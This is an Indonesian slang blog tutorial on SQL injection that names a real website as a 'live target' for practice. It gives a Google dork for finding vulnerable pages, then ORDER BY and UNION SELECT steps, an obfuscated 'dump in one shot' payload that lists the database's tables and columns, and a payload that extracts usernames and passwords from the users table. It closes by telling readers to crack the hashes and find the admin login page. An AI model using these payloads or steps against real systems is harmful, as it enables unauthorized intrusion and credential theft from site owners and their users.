Siapin bahan" dolo :
Dork : inurl://statis-1 ext:html
(kembangin ea biar dapet perawan, masak dapet janda mulu kan asw :v)
ubah angka nya 1-100 terserah ente :v
Admin finder : Cari di google atau bisa install di hp klean pakek termux DI SENE
Hashkiller : DI SENE
Kopi/Teh/Susu/Es/Tisu bebas dah :v
Yok langsung sadja :v
1. Dorking lah pakek dork diatas di mbah gugel :v
Nih Live Target buat di EUE :v : http://ciptaabadi.net/statis-1-profil.html
3. Tambahin tanda (') tanpa tanda kurung di akhir kata profil. Contoh kek gini : http://ciptaabadi.net/statis-1-profil'.html
Vuln tandanya? Kek dibawah ini
4. Kalau udah kek gitu skarang kita order by buat nyari error :v
Contoh :
http://ciptaabadi.net/statis-1-profil'+order+by+1--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+2--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+3--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+4--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+5--+-.html -> Normal
http://ciptaabadi.net/statis-1-profil'+order+by+6--+-.html -> Error
5. Brarti sampek 5 sadja ea :v tinggal nyari angka Togel nya :v
Masukin : +union+select+1,2,3,4,5--+- (jangan lupa tambahin . di depan angka)
Contoh : http://ciptaabadi.net/statis-.1-profil'+union+select+1,2,3,4,5--+-.html
6. Nah kliatan tuh angka togel nya 2 :v Langsung sadja ea kita DIOS :v
ganti angka 2 dengan kode berikut
(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)
Contoh : http://ciptaabadi.net/statis-.1-profil'+union+select+1,(/*!50000select*/(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(/*!50000select*/(0)from(information_schema.columns)/*!50000where*/(table_schema=database())and(0x00)in(@x:=/*!50000concat*/+(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x),3,4,5--+-.html
7. Nah dah kluar tuh >.< Skarang di Dump ea
Masukin kode berikut menggantikan kode dios tdi : (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(users)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x)
Contoh : http://ciptaabadi.net/statis-.1-profil'+union+select+1,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(users)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),3,4,5--+-.html
8. Nah kluar tuh id sama pass nya :v Tinggal di Hash pass nya lalu cari admin Login nya :v
Kalo gk bisa nemu admin Login, Jedorin pala lu ke tembok :v
Sekian dari ane ea :v
Kalo bingung tinggal koment ea :v
Maap kalo kurang jelas/ada yang salah penulisan :v Capek njer :v
Thanks for Badut Galau :v







Comments
Post a Comment